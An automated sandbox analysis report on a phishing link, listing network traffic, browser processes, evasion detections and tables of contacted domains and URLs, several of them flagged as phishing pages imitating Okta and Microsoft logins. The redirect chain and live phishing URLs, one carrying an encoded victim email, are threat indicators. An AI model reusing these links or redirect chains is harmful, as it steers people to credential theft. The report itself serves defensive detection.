cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1697&rtt_var=645&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1727&delivery_rate=1685912&cwnd=223&unsent_bytes=0&cid=dce444760b0a8fca&ts=628&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 18:02:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OPOgqyx6J8cQ0Dfr%2BumZ7J2oOuD7JXfl20lng6WnT9Ly3DL%2BpV1cgWxry8CmIJjMjVYOWo9qoeRZUBItTWsQUoxLiUK8Dz3fkpBpfY9B2Ojlh%2FS0oPE2k9TUvtCG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=24639&min_rtt=24614&rtt_var=9280&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2062&delivery_rate=114773&cwnd=32&unsent_bytes=0&cid=a419d8f1859b2fed&ts=364&x=0"Server: cloudflareCF-RAY: 921e66fdfa7f42d7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2182&min_rtt=2182&rtt_var=1091&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4194&recv_bytes=1726&delivery_rate=94544&cwnd=229&unsent_bytes=0&cid=8346afb623576f1e&ts=649&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 18:02:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fROCyQG4O%2Bc7Ym9nvkiea2f2EfqDEf7ghbDqZoJ0h427nnd%2FQdrI7aohxI0FZoGBQUYyfee3Ud9Ur2mcdSsMliPRRXB0u0I7G7TEdEOEK232FLtES9K%2BnVyfnO9L"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=25666&min_rtt=25657&rtt_var=9640&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2060&delivery_rate=110679&cwnd=73&unsent_bytes=0&cid=248ede96f3c90114&ts=238&x=0"Server: cloudflareCF-RAY: 921e6759ec1b8c47-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1799&rtt_var=680&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1726&delivery_rate=1602634&cwnd=220&unsent_bytes=0&cid=31bbe2123c29fd07&ts=513&x=0"
Source: chromecache_104.2.dr String found in binary or memory: http://github.com/fent/randexp.js/raw/master/LICENSE
Source: chromecache_118.2.dr String found in binary or memory: https://RFT.naturdon.com/iVYo/#D
Source: chromecache_104.2.dr String found in binary or memory: https://github.com/fent)
Source: chromecache_87.2.dr String found in binary or memory: https://www.amazon.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 63405 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63428 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63371
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63370
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63373
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63372
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63386 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63420 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63405
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63404
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63407
Source: unknown Network traffic detected: HTTP traffic on port 63383 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63406
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63409
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63408
Source: unknown Network traffic detected: HTTP traffic on port 63437 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63401
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63400
Source: unknown Network traffic detected: HTTP traffic on port 63414 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63403
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63402
Source: unknown Network traffic detected: HTTP traffic on port 63372 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63431 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63380
Source: unknown Network traffic detected: HTTP traffic on port 63408 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63382
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63381
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63384
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63383
Source: unknown Network traffic detected: HTTP traffic on port 63389 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63400 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63416
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63415
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63418
Source: unknown Network traffic detected: HTTP traffic on port 63419 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63417
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63419
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63375
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63374
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63377
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63410
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 63375 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63376
Source: unknown Network traffic detected: HTTP traffic on port 63392 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63379
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63412
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63378
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63411
Source: unknown Network traffic detected: HTTP traffic on port 63411 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63414
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63413
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63391
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 63407 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63390
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63393
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63392
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63395
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63394
Source: unknown Network traffic detected: HTTP traffic on port 63422 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63427
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63426
Source: unknown Network traffic detected: HTTP traffic on port 63416 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63429
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63428
Source: unknown Network traffic detected: HTTP traffic on port 63381 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63386
Source: unknown Network traffic detected: HTTP traffic on port 63378 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63385
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63388
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63421
Source: unknown Network traffic detected: HTTP traffic on port 63435 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63387
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63420
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63423
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63389
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63422
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63424
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63395 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63433 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63427 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63370 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63387 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63402 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63384 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63437
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 63390 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63397
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63430
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63396
Source: unknown Network traffic detected: HTTP traffic on port 63413 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63399
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63432
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63398
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63431
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63434
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63433
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63436
Source: unknown Network traffic detected: HTTP traffic on port 63398 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63435
Source: unknown Network traffic detected: HTTP traffic on port 63396 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63430 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63373 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63424 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63409 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63401 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63418 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63447 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63376 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63442
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63393 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63445
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63447
Source: unknown Network traffic detected: HTTP traffic on port 63399 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63410 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63429 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63421 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63404 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63382 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63442 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63436 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63415 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63379 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63371 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63394 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63432 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63426 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63403 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63388 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63385 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63445 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63412 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63391 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63397 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63406 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63374 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63423 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63417 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63380 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63377 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63434 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown HTTPS traffic detected: 142.250.184.228:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.89.123.122:443 -> 192.168.2.4:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.89.123.122:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 44.226.80.26:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 186.209.113.142:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.20.250:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.20.250:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:63370 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63372 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.195.46:443 -> 192.168.2.4:63378 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:63379 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.20.250:443 -> 192.168.2.4:63386 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:63390 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.4:63391 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.4:63392 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:63396 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.4:63421 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.4:63426 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:63427 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.4:63428 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:63431 version: TLS 1.2
Source: unknown HTTPS traffic detected: 92.123.12.181:443 -> 192.168.2.4:63430 version: TLS 1.2
Source: unknown HTTPS traffic detected: 92.123.12.181:443 -> 192.168.2.4:63429 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.19.96.123:443 -> 192.168.2.4:63432 version: TLS 1.2
Creates files inside the system directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Windows\SystemTemp\scoped_dir3940_1712182888 Jump to behavior
Deletes files inside the Windows folder
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File deleted: C:\Windows\SystemTemp\scoped_dir3940_1712182888 Jump to behavior
Source: classification engine Classification label: mal100.phis.evad.win@23/93@48/26
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2200,i,17724770803338348954,5673265326058284753,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2304 /prefetch:3
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhMl349dE-2BIxYKCLpL5-2B-2FL8px39hmRTYxAZ-2BeMH1CR7jYvsg3f7mQR-2BtgzEdpv6rWDyoEa1Isq60WafIaat9IMqfozrbRuGiDhSD5zRfw1vSUnaPfHOkeKVWyjmgPghsIl-2FnSiz3vjd-2BgNdZNW1WWi7RlhTni8jQbV4O1UkQOa0-2F2VYGlXOPUclqMwRi50Vl1PR4j2jhVrjOnUdA6E03jJF3YxTMCgxElFH-2Bjnu2oS6ZdGJGXf9TKr37Eh3pnVym0G5ilxnSN6bJyz-2FWbi47cL6vQDH-2FLX6HDdsxLQr4OiWNyplfwZIjGldJH3Oj3k-2B0Sr92pyHOs07I3QG9CN9BFC52s0blv8XoiBzACqb7MDZTgdhgx-2Fj3fdHjRUqn0E0aUxawEH-2F-2B7SQiAWk4bi4jHEXI-3DlKA5_AMa9RrBWZfrIG11ZEW0ArF1BRI9e8rcrPZr5T9DlZ7Ba2ZAvuJPwiS8cX4aFrXjFerUDwGcfFdNk6Ly7G30W-2FpJZ3vwwQM6aCBocvejnros7-2FYckwVQH02a6C13hCOZXCH6DxRozn9HOBenC-2BdqPCIwBV1vvkSKYyJjB4wo2MVyi5b4Ko6F9xhTiwowhGgTSo1JEnvhUu4BAFpCuBdmsFw-3D-3D"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2200,i,17724770803338348954,5673265326058284753,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2304 /prefetch:3 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected

Malware Analysis System Evasion
barindex
Yara detected AntiDebug via timestamp check
Source: Yara match File source: 2.4.d.script.csv, type: HTML
Source: Yara match File source: 3.13..script.csv, type: HTML
Source: Yara match File source: 3.14..script.csv, type: HTML
Source: Yara match File source: 3.5.pages.csv, type: HTML
Source: Yara match File source: 3.4.pages.csv, type: HTML
Source: Yara match File source: 3.6.pages.csv, type: HTML
Source: Yara match File source: 3.7.pages.csv, type: HTML
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1640820 URL: https://u17065553.ct.sendgr... Startdate: 17/03/2025 Architecture: WINDOWS Score: 100 24 Found malware configuration 2->24 26 Antivirus detection for URL or domain 2->26 28 AI detected phishing page 2->28 30 6 other signatures 2->30 6 chrome.exe 2 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.16 unknown unknown 6->14 16 192.168.2.4, 138, 443, 49272 unknown unknown 6->16 11 chrome.exe 6->11         started        process5 dnsIp6 18 u17065553.ct.sendgrid.net 167.89.123.122, 443, 49721, 49722 SENDGRIDUS United States 11->18 20 www.google.com 142.250.184.228, 443, 49720, 63442 GOOGLEUS United States 11->20 22 27 other IPs or domains 11->22
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.18.94.41
 challenges.cloudflare.com United States
13335 CLOUDFLARENETUS false
13.33.187.14
 unknown United States
16509 AMAZON-02US false
172.67.195.46
 unknown United States
13335 CLOUDFLARENETUS false
104.16.5.189
 unknown United States
13335 CLOUDFLARENETUS false
104.21.80.1
 unknown United States
13335 CLOUDFLARENETUS false
104.21.96.1
 d2fykjvf206smvkvkvv0u6jhkusv7w0lybl1wipgnt1qufyffe.sorenxw.es United States
13335 CLOUDFLARENETUS false
35.190.80.1
 a.nel.cloudflare.com United States
15169 GOOGLEUS false
142.250.184.228
 www.google.com United States
15169 GOOGLEUS false
44.226.80.26
 apiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.com United States
16509 AMAZON-02US false
104.16.2.189
 developers.cloudflare.com United States
13335 CLOUDFLARENETUS false
104.21.20.250
 rft.naturdon.com United States
13335 CLOUDFLARENETUS false
92.123.12.181
 e329293.dscd.akamaiedge.net European Union
16625 AKAMAI-ASUS false
167.89.123.122
 u17065553.ct.sendgrid.net United States
11377 SENDGRIDUS false
2.19.96.123
 unknown European Union
20940 AKAMAI-ASN1EU false
186.209.113.142
 registrosaraquari.com.br Brazil
28151 DatoraTelecomunicacoesLtdaBR false
140.82.121.4
 github.com United States
36459 GITHUBUS false
151.101.2.137
 code.jquery.com United States
54113 FASTLYUS false
188.114.97.3
 2aezx.szsnqp.ru European Union
13335 CLOUDFLARENETUS false
13.33.187.96
 d19d360lklgih4.cloudfront.net United States
16509 AMAZON-02US false
188.114.96.3
 unknown European Union
13335 CLOUDFLARENETUS false
172.67.70.233
 get.geojs.io United States
13335 CLOUDFLARENETUS false
185.199.108.133
 objects.githubusercontent.com Netherlands
54113 FASTLYUS false
104.17.25.14
 cdnjs.cloudflare.com United States
13335 CLOUDFLARENETUS false
104.26.0.100
 unknown United States
13335 CLOUDFLARENETUS false

Private

IP
192.168.2.16
192.168.2.4

Contacted Domains

Name IP Active
a.nel.cloudflare.com 35.190.80.1 true
e329293.dscd.akamaiedge.net 92.123.12.181 true
developers.cloudflare.com 104.16.2.189 true
d2fykjvf206smvkvkvv0u6jhkusv7w0lybl1wipgnt1qufyffe.sorenxw.es 104.21.96.1 true
github.com 140.82.121.4 true
2aezx.szsnqp.ru 188.114.97.3 true
u17065553.ct.sendgrid.net 167.89.123.122 true
code.jquery.com 151.101.2.137 true
cdnjs.cloudflare.com 104.17.25.14 true
challenges.cloudflare.com 104.18.94.41 true
get.geojs.io 172.67.70.233 true
www.google.com 142.250.184.228 true
d19d360lklgih4.cloudfront.net 13.33.187.96 true
registrosaraquari.com.br 186.209.113.142 true
rft.naturdon.com 104.21.20.250 true
objects.githubusercontent.com 185.199.108.133 true
apiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.com 44.226.80.26 true
app.salesforceiq.com unknown unknown
aadcdn.msauthimages.net unknown unknown
ok4static.oktacdn.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://rft.naturdon.com/wxR15iAruHCp5MR53stdlsbAewGX1FsavzlKmlR34130 false
  • Avira URL Cloud: phishing
 unknown
https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 false
    		high
    https://aadcdn.msauthimages.net/dbd5a2dd-vmlo2cc2etebjdqhg-ytquz7jjmmuxj8qlopjyoab6y/logintenantbranding/0/illustration?ts=637920231785000429 false
      		high
      https://code.jquery.com/jquery-3.6.0.min.js false
        		high
        https://rft.naturdon.com/GDSherpa-bold.woff false
        • Avira URL Cloud: phishing
        		 unknown
        https://2aezx.szsnqp.ru/loray!m1hxo77 false
        • Avira URL Cloud: safe
        		 unknown
        https://a.nel.cloudflare.com/report/v4?s=Qy3fa0ucgWYBvfzYV4smuYEaxjTnJOacrcbwajYJvX320ewuMZa4t0N29Q%2BF3OuW60kNEU5p63WcrlIcrVUtERXKZLESMDoDkq1mpEpFPA8f31BHPbIkA6sXR9UL false
          		high
          https://d2fykjvf206smvkvkvv0u6jhkusv7w0lybl1wipgnt1qufyffe.sorenxw.es/bChJbJByRMoiWVIzJsvbypYtqUVUTWUTXNFKJKJACAZSJESGCWVJJAOEENGZXBFSRWIWRBRMCVRFSKyzUgP6dnOJOXM56dsnqr50 false
          • Avira URL Cloud: safe
          		 unknown
          https://rft.naturdon.com/xyR81473VsYaArsvHmgh24 false
          • Avira URL Cloud: phishing
          		 unknown
          https://registrosaraquari.com.br/g63f/614583/Pierceatwood/?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29t false
          • Avira URL Cloud: safe
          		 unknown
          https://app.salesforceiq.com/r?target=603feeba78af1c08f5743ad0&t=AFwhZf0amBvhYfM9RctKtaa9k2LfIrNDSUS7iRYke1td_G46ivu2nAbPY5ST0sm4YvyV9nje6hJ_AkhaGAB2Q-VekJszZwpRHWS5Qxj8Pkn-XA_5zkvZHw1vuXoxIMX7IYPI_hkyjtNB&url=https://registrosaraquari.com.br/g63f/614583/Pierceatwood/?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29t false
            		high
            https://rft.naturdon.com/xyyV1ZiqNXRC8zWXcIUDTUea88bP6rhTuulsSZCyRMCDOqwZZUjy true
            • Avira URL Cloud: phishing
            		 unknown
            https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css false
              		high
              https://registrosaraquari.com.br/favicon.ico false
              • Avira URL Cloud: safe
              		 unknown
              https://rft.naturdon.com/yp9BZPnLvX9qppjZ6vwVf7ZEopBEJOVpdL8dvd false
              • Avira URL Cloud: phishing
              		 unknown
              https://registrosaraquari.com.br/0/index.xml?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29t false
                		unknown
